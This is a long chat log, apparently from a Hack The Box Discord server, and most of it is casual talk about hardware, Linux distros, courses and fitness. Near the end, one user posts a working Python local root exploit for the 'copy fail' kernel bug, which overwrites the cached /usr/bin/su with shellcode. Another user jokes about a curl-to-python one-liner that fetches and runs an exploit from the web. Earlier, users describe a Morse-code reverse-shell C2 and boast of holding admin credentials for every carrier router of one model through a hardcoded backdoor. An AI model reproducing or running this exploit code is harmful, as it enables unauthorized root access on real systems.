woah !!

Where?

I have two SDRs talking to each over RF and the program they are running can talk in morse code ^^

Where are you writing arbitrary fles over Morse code

Oh

You can abuse this to write files with morse code to locations of your choosing and drop a beacon file that communicates a revshell over morse code

That would take forever though

No it is at 100 wps

Oh

It takes about 0.5s

unless you ls a big folder

or cat a binary

100wps is workable though

Yes ^^ and morse code people cannot reverse it because the files I drop the commands are preencrypted and only I know how to translate the words at my C2

also its at 100 wps and good morse code operators understand only at about 40 wps

If I can manage to overflow a part of the SDR I could do in memory execution but for now it is filefull

Yesterday I was working on a carrier router, and dumped it's firmware and analyzed it. Then I found a set of hardcoded credentials to log into a "super admin" panel. In there, there is a debug feature to allow you to run very limited commands, mostly catting out a log file. BUT that feature doesn't sanitize user input, meaning I could Inject commands from it.

The best part is, anything run there was run as root, meaning I could replace the root password hash and login as root.

Waaaa good find ^^

The best part is these routers are extremely common here and I now have creds to the admin panel of every single one of them

Lots of routers have weird backdoors ^^

Yeah lol

skid

https://klipy.com/gifs/rigby-cat-tongue

i am skid

if you're skid

idk what I am

jk jk

no i am not skid, i dont like when talented people say that

it makes beginners or intermediates really self doubting

☺️ You all are doing fine

dont have doubts, just find loose threads and pull them yolo blaze it

https://klipy.com/gifs/cat-feeder-camera-orange-cat--k01KQGKS57HKRKWC90WQSR7N01F

Ok so final verdict don’t drop a band on seeing if mac is for me

Or try it out cause free returns

Am I beginner or intermediate

Intermediate

I'd hire you as a pentester

i use a mac instead of my linux machine because my old work place made us use a mac and i was there for 4 years, so i was forced to get used to it

but i do have it all set up to run like my linux machine

https://klipy.com/gifs/cat-leaf-1--k01KQBQPJEQPXV259HD36BJMYF1

https://catalog.purdue.edu/preview_program.php?catoid=18&poid=33873&hl="Cybersecurity"&returnto=search

will a m5 mac air get me through these classes

Or do I have to bring my pc

It's really hard imo to cross into senior status without work experience. Its just not the same no matter what you do to try to replicate enterprise envs.

Or I guess if you had some crazy bbs or CVEs I could consider someone being senior with no traditional pentesting or red teaming exp

Yeah I can imagine that

theory only goes so far

not having real world xp and such

Yeahhh and I dont mean real world is harder

I just mean how to interact with customers and handle things carefully

Real world is both harder and easier

i wish i had a job

a chromebook will get you through a professional career... you dont need anything except a way to access a VM you set up in the cloud to run w/e sec distro

https://cdn.discordapp.com/attachments/1340538749343502457/1341133470415720458/attachment-2-1-1-1.gif

Paint thinner

You will eventually vro no worries

👀

https://tenor.com/view/jinx-jinx-arcane-arcane-jinx-jinx-lol-lol-jinx-gif-12130353156992122286

Howdy

i dont even have a j*b right now, dont feel bad

Oh it’s just I see people clowning on mac users, like is life a lot easier with a windows machine

Like a lenovo

Morn Morn, Its tough to handle a labrador pup :" (, wot bt u?

its hard not to feel bad with all the pressure from your family

I use Linux baremetal on my Lenovo Legion

use w/e is comfy for you, then figure out what you need on a case by case basis and learn stuff

Ohhh Im sorry.. What happen?
Im good, soon to go to bed. Just relaxing :3
Doing some studying and sharing some crazy working idea I had about a morse code C2 over RF

Never touched mac before

so then dont get a mac

ez

What if Mac is for me but I just never knew

order off Amazon and return if buns

its literally just a unix system with some shiny bits

I just woke up :" )

but if you do windows, you have a LOT easier time reversing

O

Windows it is

Why? You can install Ida pro on Linux

Or ghidra

you can, but you cant run the windows files easily

I crack games by reversing DRMs on Linux

Lenovo Slim 7 Copilot+ Aura Edition Intel Ultra 7 258V 32GB 1TB 14" OLED W11H

is 8 hours on this normal or eh cause I swear youtubers were saying this lasts longer than macs

Well yeah

and last i checked, so so so many of the rev chals are not mac friendly

but again, the more struggle you face the more you learn

so just do stuff and see what happens

do a whole lot of fucking around, and then hopefully you get a little bit of find out in a good way

Hiiii I'm new here!

hi he's paint

Hello new here

Lol hiii, and riri

does release arena still exist?

Yes

snap is down https://status.snapcraft.io/

how did u know that do u use snap

for deploying my blog I do

gross

ikr, I should use npm for dart-sass

i don't see it on the right

does it only appear during newbox releases?

fixed now 😄

using npm for dart-sass instead of snap

Machines

US StartingPoint2

PingPong
Machines

starting point is for starting point machines not seasonal

oh you talking about RA

yes im wondering where the release arena vpn is

it's the pingpong one

ok

no but both of those are machines

there used to be a release arena vpn

Hi all

im probably not describing it well lol

this is a description of what hte vpn selection looks like, im looking for release arena so ican work it out with my schools it

https://help.hackthebox.com/en/articles/7041927-introduction-to-htb-seasons#:~:text=If you are,regular VPN servers.

It’s not showing because it’s after Wednesday

so much for the weather being around 90f the past week or two

that's a bit chilly

classic GA weather

3rd winter

what's the coldest it gets during the winter?

lol

thinking the weather is ever the same as it has been previously

thats your first mistake

some years it might dip below 32, other years it will plummet below 0

for no reason

pants

https://tenor.com/view/thefit-firefit-fit-pants-spongebob-gif-26832978

Last year , here the highest was 47C :" (

India

could be worse. I once had to spend a week in the forest at -40F

ill take the cold over the heat any day

can always put more clothes on

i wanna experience how -72C feels

cold isn't so bad if you have correct equipment

i keep my house at a crisp 68F

You have low blood sugar

cant be true

i just had 3 redbulls

Oh

more like i have low blood in my sugar

Well the test results say otherwise

3 red bulls is about the daily maximum

the test results dont say anything, because as long as i dont go to the doctor they cant diagnose me with anything and ill always be healthy

https://klipy.com/gifs/rookie-numbers-1--k01KQGZAF64ZZYGFDT6DCZJ6QZ1

same way i never got covid

i did get pretty sick once, but didnt get tested so i didnt have it

But I can

You do know I have nanobots in your blood stream right?

I hereby diagnose paint with too big pp

i hv a ques

Is my i9-14900HX severely bottlenecked by my RTX 4060?

imagine thinking nanobots would stand a chance in my toxic insides

4060 is the bottleneck

:' O

bruh 4060 is the bottle neck... 60 isn't much, and 40 is old architecture

This was purely meant as a flex nothing else you could've easily googled it

yes

I actually customized my laptop 5-6 months ago, n i just asked if i bottlenecked the cpu

I got 5070, and I have been only able to max it using either hashcat or training neural networks. it doesn't even spin the fans at maximum when gaming.

4060 ain't a flex 😭

I have a 5060 or whatever too idrk but I never train NNs on that. Why do it when you can get an A100 for free on colab

60 is always the entry level model. the chips are the same as in 70 and 80 etc, but they didn't pass quality checks so they disable stuff from them and underclock

imagine having to use a graphics card and not just doing all the calculations in your head

colab has too severe limitations for free tier

I have an A100 gpu

I pay for it

Lol

Don't need to wear out my laptop

I had 3070 and Warframe started having tiny lags, so I upgraded to 5070 and lags gone

Also no need to download heavy ass machine learning frameworks like pytorch and tensor flow locally.

pytorch in 2026?

It's GOOD

There are many functional and sufficient frameworks. You use whatever floats your boat.

What do you use?

use something with as many dependencies as you can, that way you can be sure to be included any time somebody gets a dependency injection

I used tensorflow, but installing dependencies downloading 2 gigabytes of trash is slightly annoying

Also recently I've been working on an aimbot using a CNN and I used YOLO, and yolo is made with pytorch

So

i dont even use a mouse

Exactly

I can just download the stuff on colab

Do u want my computer vision based aimbot

i dont need an aimbot

WHY

because i dont like to aim

Oh

That's why you should get a bot to it for you

no, i dont like it when i aim

I'd like to test some model with SSM, but I'm also lazy

I have not hit the context window limits, but with transformers it seems the attention is always strongest at the beginning and end of the data. it tends to lose stuff at the middle with longer inputs. I'm interesting how SSMs perform, but many frameworks don't have proper support for it yet.

I got shickened in the middle of the night

y

Bro got chickened

Time to complain

hahahha

karens get in line please

shickend

This is what I do with chicken

Who Said anything about chicken?

Shicken (verb): To act boldly and a little ridiculously in a moment of fun, usually involving an unexpected twist or surprise.
Example: “He shickened his way through the party, juggling cupcakes while riding a unicycle.”
Shicken (noun, informal): A burst of whimsical energy or a quirky idea.

Aright ...

Ok well why you got chikened yesterday?

Guys, I feel lonely 😢

Because

You have potential to be a discord mod

Woaw

🫵--> 🚪👍

true true

cannot confirm

Confirm what

I do

thanks

https://tenor.com/view/this-is-not-motherlode-mine-its-just-some-gold-ore-this-is-not-motherlode-mine-its-just-some-top-side-steak-leolichen-grinding-steak-gif-16606715742648778046

I somehow woke up early today 😞

The new Linux priv esc bug was discovered by AI in 1 hour

10X

This is my goofy ass survey

I am the customer nonetheless

I could say way more but we need custom web boxes

That's the most important

well

next season box will feature copyfail

I will feature copyfail in my ass

ok

-# ok

I hope not

Goofy ass cve (I mean it's brilliant but not fun in a box)

it's realistic!

every box before now has the vuln!

Hey guys
I am new here

Hi new here

Hello and welcome

hi im paint

What? No more CVEs and just misconfigurations? Sounds unrealistic

Custom web boxes I want Custom web boxes

That sounds unrealistic? Maybe you don't exist

Hey, I’m setting up my ThinkPad for cybersecurity/hacking labs.
Would you recommend running a Linux host (e.g. Arch Linux) with a Windows 11 VM, or a Windows 11 host with a Linux VM like Parrot OS?
I’m mainly interested in security, performance, and real-world workflow.

go for either parrot(vm) or kali (vm)

Which one would you personally choose for daily use and why?

both are not for daily "normal" use tbh

not something suited for daily driving

i meant for vm

not as a host

oh ok

hey is there anyone who does OSINT and forensics can help me out please?

then upto u both comes up with pre-built sec tools of different sorts , rest u can manually install

What would you recommend as a daily OS for cybersecurity and HTB labs?

parrot or kali

HTB uses parrot so i guess if u want similar vibe then go with it

for cybersec always use a VM (good practice)

Parrot seems a viable option since it's not really a rolling distribution, also less bloat and greater battery performance

As a main OS for everyday use (browsing, coding, etc.) + HTB labs:
would you recommend Linux or Windows as host, and then Parrot/Kali in a VM?

yup

choose whatever feels user-friendly for you

Yes pls

@glass ibex I’m stuck between:

Windows 11 + Parrot VM
Arch Linux + Windows VM

Windows 11 + Parrot VM
my preference if i was you

May I ask why?

Give why vulnlab boxes will always wins

idk i've been used windows since a kid

and for cybersec it's better to use kali vm or parrot vm

i won't go for commando vm

but nothing stops you from exploring

Doesn't really matter

It's just the same tool in the toolbox just with a different handle ...

https://tenor.com/view/cat-leaf-vibes-vibing-sleeping-cat-gif-17297041570420202318

Thanks, this was really helpful. Appreciate it!

Hello! Any suggestions of cool cyber related usernames to add on my Linux machine ?

https://tenor.com/view/google-gif-google-gif-for-messages-google-gif-gif-1045234766527568383

I did but I did not find one that I liked

https://tenor.com/view/chat-gpt-gif-14690479017210555424

Try Kali or Parrot, if you like it, stick to it. If a tool is missing you can just install it on top

then think n make one

Same for that

Suggest me one

https://tenor.com/view/claude-gif-14855546217526408320

I'm bad at naming...others shall help then xD

what about karmanya04

Hm nope

what about golam71

Kali VM

Also team Kali bc it just works for me and has a nice collection of tools

my love

https://tenor.com/view/devil-may-cry-devil-may-cry-netflix-devil-may-cry-s2-dmc-season-2-gif-7524815281730753753

isn't it so good ?

https://tenor.com/view/happy-cat-gif-10804346947536782797

shakira shakira dabaababab du da deee eeeeeeeeee sakira sakira

https://github.com/Swordfish90/cool-retro-term

golam71 the destroyer

Hi

this will help @scenic maple

0xqn the destroyer

stop

@scenic maple

Refresh your browser?

Wtf

<@&861185840277487616>

what I want to say is the page

no

touch some grass it is sunny outside

thanks very much

Now either echo is fucked or what the message was is sus

i guess you gonna get banned

Oof

Idk are you willing to click on a suspicious link and refresh your browser?

For free money bro

Cheers @supple plume here is some hearts 🤍🤍🤍🤍

Thank you

Heyho

Ohyeh

Please 😭

See what i did there

xD

Rem, u still in SK?

We just came back from japan yesterday

ahhhhh
noice

PLEASE

https://tenor.com/view/miss-congeniality-rem-rem-cycle-miss-congeniality-gif-10105498352636147019

Oh, I saw SK and thought Saskatchewan

rem's back, i'm still in japan

youre in the... FUTURE

yes

as i am in the future i can tell you what happens

Don’t spoil it

the sun will go down soon

how

Nooooo

its 5am, it cant go down

you'd be surprised

It’s 6:51 am… it just came up a while ago

how is it 6:51, are you in the atlantic?

Yes

Atlantic timezone

East of Maine there is a part of Canada

https://klipy.com/gifs/hello-i-am-underwater-1--k01KQHFA0W66ZQE8PF9J63EHMEV

We aren’t even the farthest east in North America… It’s 7:25 am now in Newfoundland

i mean alaska is the furthest east

Uh

it crosses the meridian

lol, you got me

its a super common trivia question lol, i see it so often

I am everywhere and no where

but it tricks a lot of people

I didn’t know it crossed the meridian

Today I learned something

And it’s still early

I can go back to bed

Anyway, everyone in America forgets (or has never known) that Canada is bigger and has more time zones

it has more?

6

timezone maps are so dumb

Heh. It is the same time everywhere in China

So I guess they agree with you

what is the 6th?

does the greenland timezone clip it?

or alaska

Newfoundland island is out by .5 hrs

They are one of the rare .5 offset timezones

So I’m UTC -3 and they are -2.5

Or -4 and -3.5 depending on time of year

well when we get greenland we will have a few more timezones

its all a waiting game

Lol

Y’all are too busy in Iran

Greenland can sleep easy for now

im not

unemployed like god intended

Well, if you are the invasionary force, they will be ok

i get to spread misinformation all day

https://klipy.com/gifs/misinformation-spreading--k01KQHG3HSSY86HKE33609P2FCT

Just paint, on a beach with some nunchucks

id get too distracted playing in any snow i saw

“SURRENDER PEACEFULLY!”

https://klipy.com/gifs/mcr-my-chemical-romance-4--k01KQHFYHTJ5HJ6E7QNV5814AWW

we dont get snow here very often

I’ve had plenty… not as much as Greenland I’m sure

https://tenor.com/view/nunchuck-badass-ninja-nunchuck-badass-nunchucks-gif-14952277554426232145

out="mp3.list.txt"; > "$out"; base="https://ektoplazm.com/style/goa"; total=40; total_hits=0; for i in $(seq 1 $total); do url="$base"; [ "$i" -gt 1 ] && url="$base/page/$i"; html=$(curl -fsL "$url") || { echo "[!] failed page $i"; continue; }; hits=$(echo "$html" | grep -oiP 'href="\K[^"]+mp3\.zip' | tee -a "$out" | wc -l); total_hits=$((total_hits+hits)); printf "[+] %02d/%d → %d links (total: %d)\n" "$i" "$total" "$hits" "$total_hits"; done; sort -u "$out" -o "$out"; echo "[+] unique links: $(wc -l < "$out")"

Hacking stuff

Capped at 250kb/s max download speed

Everything is under Creative Commons.

I already had a 100 albums from Ektoplazm. Removing duplicates, and we're left with 96 albums to fetch

At this rate it will take 14 hours to complete the run

https://giphy.com/gifs/happy-gilmore-DqrccgvGSmre

BRUH

@scenic maple have u seen tis

yes

damn

hold on ill get you something newer

lacks impact compared to the first one.

when's HTB relesing new promo ?

i want to get the yearly labs

@worthy cargo Made something cool, would love you thoughts on it...whenever you are online/free

Instant interactable graph via Bloodhound JSONs or yoinked thru Overthrone tool's loot (Its a AD PT framework I have been working on for last 6 months) compatible JSONs, Directly in your terminal, No Neo4j BS required , completely on

-# finally some stuff worked so ignore my excitement pls, arigatou.

Its still a WIP project tho until i test the whole killchain on GOADs for a proper PoC

As much as I love TUI, I'm not sure replicating the gui bloodhound view was the best idea here lol

Definitely looks cool, but that's gotta look like a nightmare with large domains

filters and zoom clearance is there , looks neater as u go deeper

Yeah, I imagine it would be better on the smaller scale, but reorganizing the graphs into more of a tree might suit TUI better

ah well thats a great idea , will defo apply that

thx

I like the project, though!

Thanks!

Though, it wouldn't be as good to show in a report. I'd probably still want to use bloodhound for showing associations for what goes in there.

Well its a huge project ...and not just this feature, but yeah , the more feedback from experts from here, the better results later

So if someone knows about computers, let us say general, because I have been into computers since 2014 but I have not dive deep and specialize into any course, which course will you guys recommend for a beginner in security like to me to do, which HTB course and I have interest in Computer Science, that is be it CyberSecurity or Networking I love them. Also I have been using Kali Linux since 2021 because I love it but also I have used all those OS be it MacOS and Windows a little bit. What is the recommendation you guys can give, which course should I start from. Lemme get advice from the experienced and I will be happy to know

yeah , gotta brainstorm the things i can improvise ofc

Would be cool to map writable attributes not just writable objects.. right?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

It depends on what you want to do.

Doesn’t it already exist? I think it was presented at DEFCON 32

oh whats its called , sorry i havent got a chance to go to DEFCONs yet

Thanks buddy

they publish all the talks on youtube ^^

Cyber Security

noted, sir...thx

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

and within that there is a million difference paths, at a high level does defensive(blue) or offensive(red) interest you more?

I don’t remember the name, but it’s on GitHub, just need to do a quick search on YouTube

aight

okays

Bloodhound needs some competition for sure

I'd start with cjca or at least learning the topics presented in that path (if you can't purchase the path, but highly recommend you do) then choose a path from there. Whether you wanna go defensive, offensive, wanna focus on web, enterprise domains, wi-fi, ICS, binexp, malware analysis, etc.

I'm stealing this

yos lol

Thnks

This too

offensive

i'd start down CJCA and or CPTS path, then

EZ KATKA

Thanks a lot buddy

Just know that offensive security isn't an entry level position.

This CJCA is what I will start with

I know it will take me years to reach there is pentesting an offensive security

Yes

Is there like a break after the season ends until next active box is released?

are you using kali as your daily driver?

Emmax0 the destroyer

presentation list doesnt say anything similar to BH on Defcon 32 are u sure it was 32

Break yes, but only for seasonal, active boxes are still released

Wait for me soon

huh

golam71 the destroyer

i had too much fun this season, i wanna play every weekend lol

Yeah, but it's because I hate Windows completely

This session was ass

Boxes will still be released every week, possibly more with VulnLabs and Released as Retired

0xW1LD uses arch btw

I do not, also please stop with the markdown title spam.

I only do web boxes and I got cve after cve after cve

Easy-medium

Spam?

LOL

Nice

3 messages are spam?

CVE

How do people survive with Arch

0xW1LD you are wilding

Well with the size of your messages: yes.

I'm trying to give a taste of what the season felt like

It was a good season for us bindows enjoyers

You get used to it

do you really think you are the main character champion of justice

It's not too bad really

Anyways...but \ i cant seem to find anything apart from Six Degree to DA and Defcon 28's OU having a laugh? and BHCE

I use arch by the CVE

Imagine using arch, noobs

No it's just distracting to be reading something and have it be pushed away by a massive message, might just be me

0xW1LD: No it's just distracting to be reading something and have it be pushed away by a massive message, might just be me

I installed it once and after a day I reinstalled Kali Linux I can't live in complete rolling releases

So got rid of linux to install linux ok!

You do know you don't have to get every update...

I have scripts to turn arch into my setup just one command and I am back to my custom rig

guy is using kali as his daily driver

need to start from the top here

I meant Kali Linux

Please don't use kali linux as a daily driver

My brains almost burst

What do you mean by daily driver

I've done that once and I'm doing good

https://tenor.com/view/dented-pepe-dentge-meme-hit-gif-15873918808390144538

Means like barking dog 🐕

primary os you use for most of your tasks and as a launchpad into other environments

Installed on bare metal too

I install it on bare wood

More organic

https://tenor.com/view/fig-gif-26092737

On the wiener runs the meter peter better

Nope, I dual booted with Windows because I can't run some programs in Kali

Im getting banned gng 🥀

If I were you I'd move kali to a VM rather than having it dual booted.

that would be ideal yeah

Dual boot gives a lot of problems

But for most programs I love it because it is lightweight, Windows when it boots only, more than 10GB of RAM is used

Or use a VPS, take it away from your hardware altogether

alright mate you know best good luck!!

So David Bombal lied to me

So use literally any other popular linux distro... Ubuntu, Mint, Fedora, Manjaro, PopOs

Arse linux

bro left out arch

He said he already tried arch

im fairly sure david bombal installs kali on a vm in his kali course

did he try blackarch :clueless:

A small win but I managed to convert my old router to an ap with static ip

He does bare metal for: Kali Nethunter

Ubuntu looks like an empty OS it bored me, using apt-get and a lot of things, it has fewer apps, but I will install it on my PC in future i only loved their snap store

Bro complains about Windows bloat, but is looking for bloat

What does bare metal mean

You are aware Linux is the most customizable OS out there so you can literally make it look and have anything you want, barring some Windows only apps

@west venture get chickened

Guys your Linux kernels are vulnerable to privilege escalation

*shicken

any of yall took a look and understood the copy fail cve ? got a small doubt on it

I know I like it that way

On hardware, no VM or container

direct onto hardware

I think so

I took a look but idk what it does at low level exactly

Something something inject code to the su binary in ram something something and when you run su again, the system runs the su binary as root and runs your code with it as root also

Okay now I am understanding it, but Ubuntu is good for real

Finally, I am learning some things

If you're on Discord to learn... you're gonna be really disappointed

Noooh, for networking and connecting with some people, if it is not discord I will end up with an LLM

Some crypto API library or whatever is vulnerable bc it takes a destination to write to from the user but doesn't really check if the user has permissions for that destinations. When Linux loads the su binary to the Paige cache, I guess you give the memory address of the loaded binary in memory as the location to write to. So they way, you can inject malicious code to the su binary that's cached. When you run su again, the OS just uses the cached, poisoned version, and executes your code. (I think)

so the only part thats wierd to me is that on the second entry in the RX buffer, i dont get when walker OOB's out and then when dereferences the pointer, how does that pointer point at the exact offset cause to me i still dont know why it wouldnt start at the byte 0 of the binary, i did a biyt of digging and found out that while giving the splice syscall we also give the offset within page parameter but im not sure how would that work if we dont even supply the page ourself or does the kernel internally map it out ?

Some crypto API library or whatever is vulnerable bc it takes a destination to write to from the user but doesn't really check if the user has permissions for that destinations. When Linux loads the su binary to the Paige cache, I guess you give the memory address of the loaded binary in memory as the location to write to. So they way, you can inject malicious code to the su binary that's cached. When you run su again, the OS just uses the cached, poisoned version, and executes your code. (I think)

Stfu

What are you guys on discord or what is the work of it, apart from talking with community

It's internally mapped out

but if i give a page offset then how would it know what page's offset is it

I mean I just go here to chill and give back to the community

These hackers are discord teamers

Sometimes troll

and im taking away from the community again

anyone else ?

Wooow, it's amazing guys

I know I am trying to become a discord teamer this is my power level

!rank

But you aren't giving a page offset to os.splice right? You're giving a file offset?

no its a page offset

Bro's catching up to me, I gotta yap more

I'm new to this stuffs which you guys are talking about. I am not aware what you mean by discord teamer, is it for the Discord Org or for this HTB Community

How does someone achieve this bro

It's an international company based on verbal interaction exploits via http

so someone achieves through yapping more

He's talking in code

You made me to be more dumb with that explanation

Okay, I am starting to get it now

@scenic maple teach the secrets to become a discord teamer

hello i need help with the new Xp system i'm a bit confused on how to track my progress towards elite hacker if thats even still a thing !

Labs ranks are still a thing, but you can't see content % on your profile anymore

so you just keep going until you get that rank up notification or what ? Haha

It seems so

jeez ! alright thank you

😄

🙂

It's Friday

Hell yeah finally B|

Just ate my daily ice cream

feels goood

https://tenor.com/view/ogvhs-woo-wooo-woooo-wooooo-gif-22674107

zee good stuff jaa

I eat a pint for breakfast daily

Might make 2 pints for tomorrow

bulking?

is it real ice cream?

Or like protein ice cream?

protein ice cream bro is gordon ramsy

protein ice cream

I make it

nice

I gave it to someone and they couldnt tell

recipe?

Just 2 scoops of protein, almond milk and monk fruit

freeze and then put into a Ninja creami

The type of protein matters tho

mmm

Frosty, you got any good breakfast/lunch recipes that uses yoghurt?

This protein works good

lmao

this one also does well

Told my PT that I am trying to build up more size and eating meals during the day/morning is a tad tough at the minute

XD

I had some different toughts there for a seccond

the hidden op powder xD

atm I eat this

Meal 5 is the ice cream

The Ninja creami is what I make ice cream with

I have heard great things about that machine

didint know hackers have diet

I thought it was eh at first since its just a blender

but it works way better than i wouldve imaggined

Frosty is the most jacked hacker you will probably meet

I use to compete in bodybuilding

😄

damn hahaha

https://tenor.com/view/anchorman-gun-show-tickets-to-the-gun-show-gif-20673907

ow nice bro keep it up

deutschland uber alles I guess

https://klipy.com/gifs/wide-awake-wide-eyes--k01KQHVE4ACR2H235FS92VTCF1Q

hope u ain't high

Why is boost just not integrated with C++

it makes no sense that it's its own independent entity

C++ needs a place to get packages, same for C

Use javascript

Htb release my machine

That arm is more than some people's waist lmao

Like @native plume

hooooooly fuck good job dude

How far did you make it into boot.dev? Are you still doing it?

oh im like halfway through

i havnt touched it for like 2 weeks because I was on a drug called Caffeine

today i gotta re-sub

later after lunch

instead I was doing system programming for a bit taking code and translating it to another language

im crazy

Dayum! Like the entire website half way through?

I think that's a great project

haha

Hasta las moscas tienen mas suerte que yo

Cause python it keeps saying allows things that make other languages harder. Since it's dynamic I know the lessons say that there are concepts that python "can" do, but it's not built in like other languages

No I was late on a call with someone on some stuff

I'm sticking with it for now just cause I want the ease of building my tool like a braindead code monkey. Then after that I'll switch to something that requires more adept skills.

Bro I don't understand your English

Going to bed rn tho, gn chat

You don't need to

Best answer I've read today

@gentle tulip are you by any chance there?

Why tf python zip() doesn't compress my data

any admins online or mods

always

can I send you a direct message? I don't wanna break any rules cuz I am new

what's it about

a scam / false presentation of admins in the server

For anything moderation related you don't need to ask permission to DM a mod/admin, so go ahead

okay great just wanted to make sure thank you!

Hey How to make portfolio ...can someone guide
..I am really confused

It's too blurry to read

Well the typescript pathway more like

Let me change that

Goto lenskart

oh nyo

Why tf are there soo many rich biches in general today

With their fancy ahh decorations

I'm going through the entire backend path at the moment. Finished functional programming and just started to do some challenges to keep my streak up. Then working on a personal project.

How's the typescript? Also they have a boss, so bonus exp and rewards if you start up again.

who

Y'all

You

Specifically karmanya03

No coffee

I like tea tea

Also who is karmanya03

me no rich

https://tenor.com/view/wait-a-minute-who-are-you-kazoo-kid-funny-gif-16933963

a random guy

I haven't seen you here

-# (itz my real name tho)

rich

Within the last few years to decades

i joined a few times here but never talked

Lmao

:1984:

I didn't delete it aut0

dude is impersonating an admin so he can teach me to trade crypto

stop saying stuff that would compel me to kick u out of the server @devout sail

didn't even bother to join the htb server

Yes I am also an admin

But everyone says deek and stuff

And ... Alright

:exit:

May I dm you? I can't post screenshot here

I'll just enjoy the normal tea²

Dm me
Wanna see who got impersonated

I am not an admin

Was it falconspy again?

nope NightWolf56

Oh

Alright

Send me a ss anyway

I'll post it here

I was just curious to know the name

Don't impersonate admin/mod/staff

Hmm tejas

Can I have your pfp

For some research purpose

u could download by urself 🫠

https://cdn.discordapp.com/avatars/561210274653274133/7bc38545866c376db934818118ee4829.png?size=512

see

Brb

it is time until we see impersonation of me

Keep your hammer ready

That copy fail exploit bullshit is way to complicated for me to understand

yes, I'm gonna ban ur real account to enternal as well.

I get the concept but the PoC is shit

Bruh just be yourself, script kitty, forget how it works and run
curl https://copy.fail/exp | python3 && su

You don't need all that I made a PoC that directly drops you into a root shell

What if the curl output is sending a root rev shell to someone else?

Until the domain gets highjacked by bad actors

Why would bad actors hijack domains? Are they having trouble finding acting jobs bc they're bad at acting?

they can have it as fee

Ever heard about multitasking

Anyways

Yes

Multithreading

I had skin care today

I got sunburned yesterday

My skin is peeling off

Took 2h lmao

I keep sunscreen in my bag

Always

It's been in my bag from like 1y

Haven't used it ever

Why do you keep it?

because his skin is weak

Ex gave me to use it
But helmet covers whole face too so it just gets wiped out

It lasted more than relationship 💀

I do use the lip balm tho
It's nice

Imagine if the copy.fail research was an APT group that just tricked us into thinking they were researchers so thay can spread malware via the "exploit poc"

What would they gain by doing that?

Your shell

People running a persistent c2 because they think it is just a test poc

You're just giving away a zero day source code

I think 0xdf made a video

Go watch it

But I have the source code

Sauce code 😺

And I could also write my own exploit

The thing is, the source contains a binary ... could technically still be malicious

Well just copy past the code

They did't include the c code for the shellcode

At least initially

Oh

It could work if it wasn't this popular lmao
Like that one time someone made an exploit for huntress CTF, it works but was also a malware 💀

python has the smallest poc

The functional programming course was confusing because they dont explain in detail why things work the way they do

Well Gemini figured it out independently and gave me a working exploit 💀

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

I asked my clanker

I haven't started typescripting though not yet im on the data structs and algorithms course

Yeah, I fed a lot of the concepts into claude and then had it provide me with examples. I also used Boots after I completed certain lessons to explain this better. Had full on chats with that bear. I might need to be medicated. lmao

I spent money on a book dedicated to understanding functional programming

im honestly impressed at how it works

I mean I am just joking anyways and also trusted the poc script, but still the approach can make a bit sceptical ... piping curl into python is generally not a good idea 😄

I'm gonna have another niece/nephew 🙂

It's very clean. Recursion and currying are some of my favorites.

i started reading that instead of working on boot.dev as well

Congratulations

like this guy

Sweet

the author he's written a lot of books

and it's like listening to a genius flaunt how much money he's made

like you can't say anything bad because he knows his shit.

I curl to bash all the time

I also pipe cat to grep

What's the book? you got me interested now. Also is it in python or another language?

then you know it got me thinking

it's python he's a professional in it

cat file.txt | grep "whatever"

but the way he writes code

is like you could tell he knows more than the average guy

Savant, you might say?

Servant *